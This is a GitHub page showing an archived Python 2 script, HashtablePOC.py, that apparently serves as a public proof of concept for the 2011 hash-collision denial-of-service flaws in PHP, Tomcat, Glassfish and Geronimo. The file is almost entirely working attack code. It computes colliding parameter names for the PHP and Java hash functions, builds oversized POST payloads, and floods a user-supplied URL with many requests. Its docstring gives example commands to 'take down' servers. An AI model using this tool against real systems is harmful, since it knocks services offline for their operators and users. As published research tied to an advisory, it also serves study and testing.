This repository was archived by the owner on Apr 12, 2025. It is now read-only.
-
-
Notifications
You must be signed in to change notification settings - Fork 26
/
Copy pathHashtablePOC.py
executable file
·359 lines (313 loc) · 12.8 KB
/
HashtablePOC.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
#! /usr/bin/env python
"""
This script was written by Christian Mehlmauer <FireFart@gmail.com>
https://twitter.com/#!/_FireFart_
Sourcecode online at:
https://github.com/FireFart/HashCollision-DOS-POC
Original PHP Payloadgenerator taken from https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
http://www.ocert.org/advisories/ocert-2011-003.html
CVE:
Apache Geronimo: CVE-2011-5034
Oracle Glassfish: CVE-2011-5035
PHP: CVE-2011-4885
Apache Tomcat: CVE-2011-4858
requires Python 2.7
Examples:
-) Make a single Request, wait for the response and save the response to output0.html
python HashtablePOC.py -u https://host/index.php -v -c 1 -w -o output -t PHP
-) Take down a PHP server(make 500 requests without waiting for a response):
python HashtablePOC.py -u https://host/index.php -v -c 500 -t PHP
-) Take down a JAVA server(tested with Tomcat and Glassfish; make 500 requests without waiting for a response, maximum POST data size 2MB):
python HashtablePOC.py -u https://host/index.jsp -v -c 500 -t JAVA -m 2
Changelog:
v6.0: Added Javapayloadgenerator
v5.0: Define max payload size as parameter
v4.0: Get PHP Collision Chars on the fly
v3.0: Load Payload from file
v2.0: Added Support for https, switched to HTTP 1.1
v1.0: Initial Release
"""
import socket
import sys
import math
import urllib
import string
import time
import urlparse
import argparse
import ssl
import random
import itertools
class Payloadgenerator:
# Maximum recursions when searching for collisionchars
_recursivemax = 15
_recursivecounter = 1
def __init__(self, verbose, collisionchars = 5, collisioncharlength = 2, payloadlength = 8):
self._verbose = verbose
self._collisionchars = collisionchars
self._collisioncharlength = collisioncharlength
self._payloadlength = payloadlength
def generateASPPayload(self):
raise Exception("ASP Payload not implemented")
def generateJAVAPayload(self):
a = self._computeJAVACollisionChars(self._collisionchars)
return self._generatePayload(a, self._payloadlength)
def generatePHPPayload(self):
# Note: Default max POST Data Length in PHP is 8388608 bytes (8MB)
# compute entries with collisions in PHP hashtable hash function
a = self._computePHPCollisionChars(self._collisionchars)
return self._generatePayload(a, self._payloadlength);
def _computePHPCollisionChars(self, count):
charrange = range(0, 256)
return self._computeCollisionChars(self._DJBX33A, count, charrange)
def _computeJAVACollisionChars(self, count):
charrange = range(0, 129)
return self._computeCollisionChars(self._DJBX31A, count, charrange)
def _computeCollisionChars(self, function, count, charrange):
hashes = {}
counter = 0
length = self._collisioncharlength
a = ""
for i in charrange:
a = a+chr(i)
source = list(itertools.product(a, repeat=length))
basestr = ''.join(random.choice(source))
basehash = function(basestr)
hashes[str(counter)] = basestr
counter = counter + 1
for item in source:
tempstr = ''.join(item)
if tempstr == basestr:
continue
if function(tempstr) == basehash:
hashes[str(counter)] = tempstr
counter = counter + 1
if counter >= count:
break;
if counter < count:
# Try it again
if self._recursivecounter > self._recursivemax:
print("Not enought values found. Please start this script again")
sys.exit(1)
print("%d: Not enough values found. Trying it again..." % self._recursivecounter)
self._recursivecounter = self._recursivecounter + 1
hashes = self._computeCollisionChars(function, count, charrange)
else:
if self._verbose:
print("Found values:")
for item in hashes:
tempstr = hashes[item]
print("\tValue: %s\tHash: %s" % (tempstr, function(tempstr)))
for i in tempstr:
print("\t\tValue: %s\tCharcode: %d" % (i, ord(i)))
return hashes
def _DJBXA(self, inputstring, base, start):
counter = len(inputstring) - 1
result = start
for item in inputstring:
result = result + (math.pow(base, counter) * ord(item))
counter = counter - 1
return int(round(result))
#PHP
def _DJBX33A(self, inputstring):
return self._DJBXA(inputstring, 33, 5381)
#Java
def _DJBX31A(self, inputstring):
return self._DJBXA(inputstring, 31, 0)
#ASP
def _DJBX33X(self, inputstring):
counter = len(inputstring) - 1
result = 5381
for item in inputstring:
result = result + (int(round(math.pow(33, counter))) ^ ord(item))
counter = counter - 1
return int(round(result))
def _generatePayload(self, collisionchars, payloadlength):
# Taken from:
# https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
# how long should the payload be
length = payloadlength
size = len(collisionchars)
post = ""
maxvaluefloat = math.pow(size,length)
maxvalueint = int(math.floor(maxvaluefloat))
for i in range (maxvalueint):
inputstring = self._base_convert(i, size)
result = inputstring.rjust(length, "0")
for item in collisionchars:
result = result.replace(str(item), collisionchars[item])
post += urllib.urlencode({result:""}) + "&"
return post;
def _base_convert(self, num, base):
fullalphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
alphabet = fullalphabet[:base]
if (num == 0):
return alphabet[0]
arr = []
base = len(alphabet)
while num:
rem = num % base
num = num // base
arr.append(alphabet[rem])
arr.reverse()
return "".join(arr)
def main():
parser = argparse.ArgumentParser(description="Take down a remote Host via Hashcollisions", prog="Universal Hashcollision Exploit")
parser.add_argument("-u", "--url", dest="url", help="Url to attack", required=True)
parser.add_argument("-w", "--wait", dest="wait", action="store_true", default=False, help="wait for Response")
parser.add_argument("-c", "--count", dest="count", type=int, default=1, help="How many requests")
parser.add_argument("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output")
parser.add_argument("-s", "--save", dest="save", help="Save payload to file")
parser.add_argument("-p", "--payload", dest="payload", help="Save payload to file")
parser.add_argument("-o", "--output", dest="output", help="Save Server response to file. This name is only a pattern. HTML Extension will be appended. Implies -w")
parser.add_argument("-t", "--target", dest="target", help="Target of the attack", choices=["ASP", "PHP", "JAVA"], required=True)
parser.add_argument("-m", "--max-payload-size", dest="maxpayloadsize", help="Maximum size of the Payload in Megabyte. PHPs defaultconfiguration does not allow more than 8MB, Tomcat is 2MB", type=int)
parser.add_argument("-g", "--generate", dest="generate", help="Only generate Payload and exit", default=False, action="store_true")
parser.add_argument("--version", action="version", version="%(prog)s 6.0")
options = parser.parse_args()
if options.target == "PHP":
if not options.maxpayloadsize or options.maxpayloadsize == 0:
maxpayloadsize = 8
else:
maxpayloadsize = options.maxpayloadsize
elif options.target == "ASP":
if not options.maxpayloadsize or options.maxpayloadsize == 0:
maxpayloadsize = 8
else:
maxpayloadsize = options.maxpayloadsize
elif options.target == "JAVA":
if not options.maxpayloadsize or options.maxpayloadsize == 0:
maxpayloadsize = 2
else:
maxpayloadsize = options.maxpayloadsize
else:
print("Target %s not yet implemented" % options.target)
sys.exit(1)
url = urlparse.urlparse(options.url)
if not url.scheme:
print("Please provide a scheme to the URL(http://, https://,..")
sys.exit(1)
host = url.hostname
path = url.path
port = url.port
if not port:
if url.scheme == "https":
port = 443
elif url.scheme == "http":
port = 80
else:
print("Unsupported Protocol %s" % url.scheme)
sys.exit(1)
if not path:
path = "/"
if not options.payload:
print("Generating Payload...")
# Number of colliding chars to find
collisionchars = 5
# Length of the collision chars (2 = Ey, FZ; 3=HyA, ...)
collisioncharlength = 2
# Length of each parameter in the payload
payloadlength = 8
generator = Payloadgenerator(options.verbose, collisionchars, collisioncharlength, payloadlength)
if options.target == "PHP":
payload = generator.generatePHPPayload()
elif options.target == "ASP":
#payload = generateASPPayload()
print("Target %s not yet implemented" % options.target)
sys.exit(1)
elif options.target == "JAVA":
payload = generator.generateJAVAPayload()
else:
print("Target %s not yet implemented" % options.target)
sys.exit(1)
print("Payload generated")
else:
f = open(options.payload, "r")
payload = f.read()
f.close()
print("Loaded Payload from %s" % options.payload)
# trim to maximum payload size (in MB)
maxinmb = maxpayloadsize*1024*1024
payload = payload[:maxinmb]
# remove last invalid(cut off) parameter
position = payload.rfind("=&")
payload = payload[:position+1]
# Save payload
if options.save:
f = open(options.save, "w")
f.write(payload)
f.close()
print("Payload saved to %s" % options.save)
# User selected to only generate the payload
if options.generate:
return
print("Host: %s" % host)
print("Port: %s" % str(port))
print("path: %s" % path)
print
print
for i in range(options.count):
print("sending Request #%s..." % str(i+1))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if url.scheme == "https":
ssl_sock = ssl.wrap_socket(sock)
ssl_sock.connect((host, port))
ssl_sock.settimeout(None)
else:
sock.connect((host, port))
sock.settimeout(None)
request = "POST %s HTTP/1.1\r\n\
Host: %s\r\n\
Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n\
Connection: Close\r\n\
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 ( .NET CLR 3.5.30729; .NET4.0E)\r\n\
Content-Length: %s\r\n\
\r\n\
%s\r\n\
\r\n" % (path, host, str(len(payload)), payload)
if url.scheme == "https":
ssl_sock.send(request)
else:
sock.send(request)
if options.verbose:
if len(request) > 400:
print(request[:400]+"....")
else:
print(request)
print("")
if options.wait or options.output:
start = time.time()
if url.scheme == "https":
data = ssl_sock.recv(1024)
string = ""
while len(data):
string = string + data
data = ssl_sock.recv(1024)
else:
data = sock.recv(1024)
string = ""
while len(data):
string = string + data
data = sock.recv(1024)
elapsed = (time.time() - start)
print("Request %s finished" % str(i+1))
print("Request %s duration: %s" % (str(i+1), elapsed))
split = string.partition("\r\n\r\n")
header = split[0]
content = split[2]
if options.verbose:
# only print http header
print("")
print(header)
print("")
if options.output:
f = open(options.output+str(i)+".html", "w")
f.write("<!-- "+header+" -->\r\n"+content)
f.close()
if url.scheme == "https":
ssl_sock.close()
sock.close()
else:
sock.close()
if __name__ == "__main__":
main()